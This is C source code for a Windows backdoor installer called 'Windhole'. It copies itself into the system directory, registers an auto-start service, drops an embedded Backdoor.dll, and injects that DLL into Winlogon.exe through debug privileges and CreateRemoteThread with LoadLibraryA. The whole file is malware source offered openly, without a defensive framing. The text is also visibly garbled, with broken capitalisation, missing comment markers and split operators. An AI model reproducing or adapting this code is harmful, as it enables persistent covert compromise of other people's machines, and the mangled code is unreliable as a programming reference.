Header
#include "Bkdlldata.h"
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <psapi.h>
#include <winsvc.h>
//---------------------------------------------------------------------
GLOBAL constant
Char servicename[9] = "Windhole";
const char DISPLAYNAME[33] = "Windhole backdoor Service";
const char SRVFILENAME[13] = "Windhole.exe";
const char BDRFILENAME[13] = "Backdoor.dll";
const char DESTPROC[19] = "Winlogon.exe";
//---------------------------------------------------------------------
Glabal variable
Service_status Myservicestatus;
Service_status_handle Myservicestatushandle;
int willstop = 0;
//---------------------------------------------------------------------
Function Declaration
int Addprivilege (const char *name);
void Myservicestart (int argc, char *argv[]);
void Myservicectrlhandler (DWORD opcode);
DWORD mywrokthread (void);
DWORD processtopid (const char *inputprocessname);
//---------------------------------------------------------------------
Function definition
int main (int argc,char *argv[])
{
Start as a service if the parameter is "-service"
if ((argc >= 2) && (!LSTRCMP (argv[1], "-service")))
{
Service_table_entry dispatchtable[] =
{
{SERVICENAME, (lpservice_main_function) Myservicestart},
{NULL, NULL}
};
if (! StartServiceCtrlDispatcher (dispatchtable))
{
return 1;
}
return 0;
}
Otherwise, the service will be installed automatically
Copy itself to the system directory
Char Destname[max_path + 1];
Char Nowname[max_path + 1];
ZeroMemory (Destname,max_path + 1);
ZeroMemory (Nowname,max_path + 1);
if (! GetSystemDirectory (Destname,max_path))
{
printf ("getsystemdirectory () error =%d/ninstall failure!/n", GetLastError ());
return 1;
}
Lstrcat (Destname, "//");
Lstrcat (Destname,srvfilename);
if (! GetModuleFileName (Null,nowname,max_path))
{
printf ("GetModuleFileName () error =%d/ninstall failure!/n", GetLastError ());
return 1;
}
if (! CopyFile (nowname,destname,0))
{
printf ("CopyFile () error =%d/ninstall failure!/n", GetLastError ());
return 1;
}
Installation Services
Sc_handle NewService, SCM;
Connect SCM
if (! ( SCM = OpenSCManager (null, NULL, Sc_manager_create_service)))
{
printf ("OpenSCManager () error =%d/ninstall failure!/n", GetLastError ());
return 1;
}
When starting as a service, add the "-service" parameter
Lstrcat (Destname, "-service");
if (! ( NewService = CreateService (SCM,
SERVICENAME,
DISPLAYNAME,
Service_all_access,
Service_win32_own_process,
Service_Auto_Start,
Service_error_normal,
Destname,
NULL, NULL, NULL, NULL, or null)))
{
printf ("CreateService () error =%d/ninstall failure!/n", GetLastError ());
}
Else
{
printf ("Install success!/n");
Char *pra[] = {"-service", "/0"};
if (! StartService (newservice,1, (const char * *) PRA))
{
printf ("StartService () error =%d/nstart service failure!/n", GetLastError ());
}
Else
{
printf ("Start service success!/n");
}
}
Closeservicehandle (NewService);
Closeservicehandle (SCM);
return 0;
}
//---------------------------------------------------------------------
DWORD myworkthread (void)
{
Sleep (4000);
FILE *FP;
if (fp = fopen (Bdrfilename, "wb") = = = NULL)
{
Willstop = 1;
return 1;
}
Fwrite (Data1,sizeof (data1), 1,FP);
Fwrite (Data2,sizeof (data2), 1,FP);
Fwrite (Data3,sizeof (data3), 1,FP);
Fwrite (Data4,sizeof (DATA4), 1,FP);
Fwrite (Data5,sizeof (DATA5), 1,FP);
Fclose (FP);
Char Fullname[max_path + 1];
ZeroMemory (Fullname,max_path + 1);
GetSystemDirectory (Fullname,max_path);
Lstrcat (FullName, "//");
Lstrcat (Fullname,bdrfilename);
If you are opening a system process, you must first request the debug permission
Addprivilege (Se_debug_name);
HANDLE hremoteprocess = NULL;
DWORD Pid = Processtopid (Destproc);
if ((hremoteprocess = openprocess (Process_create_thread |//Allow remote creation of threads
process_vm_operation | Allow remote VM operations
Process_vm_write | Allow remote VMs to write
Process_vm_read,//Allow remote VM to read
0,
Pid)) = = NULL)
{
Willstop = 1;
return 1;
}
char *pdllname = NULL;
if ((Pdllname = (char *) VirtualAllocEx (hremoteprocess,
Null
Lstrlen (FullName) + 1,
Mem_commit,
page_readwrite)) = = NULL)
{
CloseHandle (hremoteprocess);
Willstop = 1;
return 1;
}
Copy the path name of the DLL to the memory space of the remote process using the WriteProcessMemory function
if (WriteProcessMemory (hremoteprocess,
Pdllname,
FullName,
Lstrlen (FullName),
NULL) = = 0)
{
VirtualFreeEx (hremoteprocess,pdllname,0,mem_release);
CloseHandle (hremoteprocess);
Willstop = 1;
return 1;
}
Calculate the entry address for the LoadLibraryA
Pthread_start_routine pfnstartaddr = NULL;
if (pfnstartaddr = (pthread_start_routine) GetProcAddress (
GetModuleHandle (TEXT ("kernel32")), "LoadLibraryA")) = = NULL)
{
VirtualFreeEx (hremoteprocess,pdllname,0,mem_release);
CloseHandle (hremoteprocess);
Willstop = 1;
return 1;
}
DWORD ThreadId = 0;
CreateRemoteThread (hremoteprocess,//embedded remote process
Null
0,
PFNSTARTADDR,//loadlibrarya's entry address.
Pdllname,
0,
&threadid);
CloseHandle (hremoteprocess);
Willstop = 1;
return 0;
}
//---------------------------------------------------------------------
void Myservicestart (int argc, char *argv[])
{
if (! ( Myservicestatushandle = RegisterServiceCtrlHandler (SERVICENAME, (lphandler_function) myservicectrlhandler)))
{
Return
}
Myservicestatus.dwservicetype = Service_win32;
Myservicestatus.dwcurrentstate = service_start_pending;
myservicestatus.dwcontrolsaccepted = Service_accept_stop | Service_accept_pause_continue;
Myservicestatus.dwwin32exitcode = 0;
Myservicestatus.dwservicespecificexitcode = 0;
Myservicestatus.dwcheckpoint = 0;
Myservicestatus.dwwaithint = 0;
if (! SetServiceStatus (Myservicestatushandle, &myservicestatus))
{
Return
}
DWORD Threadid;
Initialization code goes here. Handle error condition
if (! CreateThread (NULL, 0, (lpthread_start_routine) myworkthread,null, 0, &threadid))
{
Myservicestatus.dwcurrentstate = service_stopped;
Myservicestatus.dwcheckpoint = 0;
Myservicestatus.dwwaithint = 0;
Myservicestatus.dwwin32exitcode = GetLastError ();
Myservicestatus.dwservicespecificexitcode = GetLastError ();
SetServiceStatus (Myservicestatushandle, &myservicestatus);
Return
}
Initialization Complete-report running status.
Myservicestatus.dwcurrentstate = service_running;
Myservicestatus.dwcheckpoint = 0;
Myservicestatus.dwwaithint = 0;
if (! SetServiceStatus (Myservicestatushandle, &myservicestatus))
{
Return
}
while (Willstop = = 0)
{
Sleep (200);
}
Myservicestatus.dwwin32exitcode = 0;
Myservicestatus.dwcurrentstate = service_stopped;
Myservicestatus.dwcheckpoint = 0;
Myservicestatus.dwwaithint = 0;
SetServiceStatus (Myservicestatushandle, &myservicestatus);
Return
}
//---------------------------------------------------------------------
void Myservicectrlhandler (DWORD Opcode)
{
Switch (Opcode)
{
Case Service_control_pause:
Do whatever it takes-to-pause here.
Myservicestatus.dwcurrentstate = service_paused;
Break
Case Service_control_continue:
Do whatever it takes to continue here.
Myservicestatus.dwcurrentstate = service_running;
Break
Case SERVICE_CONTROL_STOP:
Do whatever it takes-stop here.
Myservicestatus.dwwin32exitcode = 0;
Myservicestatus.dwcurrentstate = service_stopped;
Myservicestatus.dwcheckpoint = 0;
Myservicestatus.dwwaithint = 0;
SetServiceStatus (Myservicestatushandle, &myservicestatus);
Willstop = 1;
Return
Case Service_control_interrogate:
Fall through to send the current status.
Break
}
Send current status.
if (! SetServiceStatus (Myservicestatushandle, &myservicestatus))
{
Return
}
Return
}
//---------------------------------------------------------------------
Adds the specified privilege to the current process
int Addprivilege (const char *name)
{
HANDLE Htoken;
Token_privileges TP;
LUID LUID;
if (! OpenProcessToken (GetCurrentProcess (),
token_adjust_privileges| Token_query,
&htoken))
{
printf ("OpenProcessToken error./n");
return 1;
}
if (! Lookupprivilegevalue (Null,name,&luid))
{
printf ("Lookupprivilegevalue error./n");
return 1;
}
Tp. Privilegecount = 1;
Tp. Privileges[0]. Attributes = se_privilege_enabled;
Tp. Privileges[0]. Luid = Luid;
if (! AdjustTokenPrivileges (Htoken,
0,
&TP,
sizeof (Token_privileges),
Null
NULL))
{
printf ("AdjustTokenPrivileges error./n");
return 1;
}
return 0;
}
//---------------------------------------------------------------------
A function that converts a process name to a PID
DWORD processtopid (const char *inputprocessname)
{
DWORD aprocesses[1024], cbneeded, cprocesses;
unsigned int i;
HANDLE hprocess = NULL;
hmodule hmod = NULL;
Char Szprocessname[max_path] = "unknownprocess";
Addprivilege (Se_debug_name);
Calculate how many processes are currently in place, aprocesses[] to hold an effective process PIDs
if (! EnumProcesses (aprocesses, sizeof (aprocesses), &cbneeded))
{
return 0;
}
Cprocesses = cbneeded/sizeof (DWORD);
//To traverse all processes by a valid PID
for (i = 0; i < cprocesses; i++)
{
//To open a specific PID process
hprocess = openprocess (proces s_query_information |
Process_vm_read,
FALSE, aprocesses);
//Get the process name of the specific PID
if (hprocess)
{
if (EnumProcessModules (hprocess, &hmod, sizeof (HMOD), &cbneeded )
{
GetModuleBaseName (hprocess, Hmod,
szProcessName, sizeof (szProcessName));
//The process name to be obtained is compared with the input process name, as the same returns the process PID
if (!stricmp (szProcessName, inputprocessname))
{
CloseHandle ( hprocess);
return aprocesses;
}
}
}//end of If (hprocess)
}//end of For
//does not find the corresponding process name, returns 0
CloseHandle (hprocess);
return 0;
}